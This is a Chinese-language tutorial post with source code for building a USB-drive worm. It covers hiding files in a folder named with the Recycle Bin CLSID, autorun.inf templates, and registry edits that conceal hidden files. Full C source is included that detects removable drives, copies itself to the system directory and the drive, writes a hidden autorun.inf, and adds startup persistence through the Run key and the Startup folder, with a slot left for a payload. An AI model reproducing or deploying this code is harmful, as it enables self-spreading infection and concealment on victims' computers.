u盘病毒制作教程和源码

来源：互联网发布：订单生成器软件下载编辑：程序博客网时间：2024/05/17 16:47

U盘病毒制作教程

知识点：

---------------------------------------------------------------
新建文件夹的名字是：
回收站.{645FF040-5081-101B-9F08-00AA002F954E}
这样就可以隐藏里面的文件了，打开此文件夹的时候直接进入回收站
---------------------------------------------------------------
autorun.inf
[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe

---------------------------------------------------------------
设置隐藏文件夹的属性不可见的注册表:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue------>1
HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
Hidden------------>2

ShowSuperHidden--->1

---------------------------------------------------------------

关闭u盘自动播放功能：
1.关闭shell Hardware Detection 服务,并禁用此项服务
2.打开组策略（gpedit.msc）找到“计算机配置”----“管理模板”---“系统”-----“关闭自动播放”，进行设置
3.修改注册表[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:0000000c

// 20130927.cpp : Defines the entry point for the application.//#include "stdafx.h"#include <stdio.h>//全局变量好办事char U_path[]="a:\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}";//默认u盘路径为a//获得正确U盘盘符char GetUName(){char i;char u_path[7]="";for (i='a';i<='z';i++){u_path[0]=i;u_path[1]=':';u_path[2]='\\';u_path[3]='\\';u_path[4]='\0';if (GetDriveType(u_path)==DRIVE_REMOVABLE){return i;}}return NULL;}bool CheckDisk(){if (GetUName()!=NULL){U_path[0]=GetUName();return true;}return false;}//每过5秒扫描一次void ScanDisk(){while (!CheckDisk()){Sleep(5000);}}//病毒行为！void VirusAction(){//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////双击U盘运行程序的AutoRun.infchar f_inf_name[]="a:\\AutoRun.inf";f_inf_name[0]=U_path[0];char f_inf_content[]="[AutoRun]\r\nopen=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\open\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe\r\nshell\\explore\\Command=.\\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\\20130927.exe";FILE *pf_inf = fopen(f_inf_name,"wb+");if (pf_inf!=NULL){fwrite(f_inf_content,sizeof(char),sizeof(f_inf_content),pf_inf);fclose(pf_inf);}SetFileAttributes(f_inf_name,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);////////////////////////////////////////////////////////////////////////////拷贝到系统目录char path_system[MAX_PATH];GetSystemDirectory(path_system,MAX_PATH);strcat(path_system,"\\20130927.exe");char path_thisEXE[MAX_PATH];GetModuleFileName(NULL,path_thisEXE,MAX_PATH);//If this parameter is TRUE and the new file already exists, the function failsCopyFile(path_thisEXE,path_system,TRUE);//拷贝到U盘CreateDirectory(U_path,NULL);strcat(U_path,"\\20130927.exe");CopyFile(path_thisEXE,U_path,TRUE);////////////////////////////////////////////////////////////////////////////开机启动此程序HKEY h_openkey;DWORD cbData_1=200;RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_ALL_ACCESS,&h_openkey);RegSetValueEx(h_openkey,"KeyName",0,REG_SZ,(BYTE*)path_system,cbData_1);RegCloseKey(h_openkey);char t_AutoStartPath[MAX_PATH]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动";strcat(t_AutoStartPath,"\\20130927.exe");CopyFile(path_thisEXE,t_AutoStartPath,TRUE);////////////////////////////////////////////////////////////////////////////隐藏程序//设置隐藏文件夹不可见DWORD Data=2;RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced",0,KEY_ALL_ACCESS,&h_openkey);RegSetValueEx(h_openkey,"Hidden",0,REG_DWORD,(const BYTE*)(&Data),sizeof(Data));//最后面的那个参数很重要RegCloseKey(h_openkey);////////////////////////////////////////////////////////////////////////////////   此处可写你想做的的“罪恶行为”！//////////////////////////////////////////////////////////////////////////////////执行U盘里那个程序，防止删除if (strcmp(path_thisEXE,U_path)!=0)//只执行一次{WinExec(U_path,SW_HIDE);}else{while(1)//死循环永远不退出程序{Sleep(50*1000);//降低CPU负载}}}int APIENTRY WinMain(HINSTANCE hInstance,                     HINSTANCE hPrevInstance,                     LPSTR     lpCmdLine,                     int       nCmdShow){ // TODO: Place code here.//主程序包括两部分：磁盘扫描和病毒感染//磁盘扫描ScanDisk();//扫描不到U盘下个函数就不会执行//病毒感染VirusAction();return 0;}

Autorun.inf文件内容：

autorun病毒:
Autorun.inf

[AutoRun]
open=notepad.exe
shellexecute=notepad.exe
shell\Auto\command=notepad.exe

[AutoRun]
open=notepad.exe
shell\open=打开(&o)
shell\open\command=notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=notepad.exe

[AutoRun]
open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open=打开(&o)
shell\open\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Defalut=1
shell\explore=资源管理(&o)
shell\explore\command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe

open=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\open\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe
shell\explore\Command=.\回收站.{645FF040-5081-101B-9F08-00AA002F954E}\notepad.exe

0 0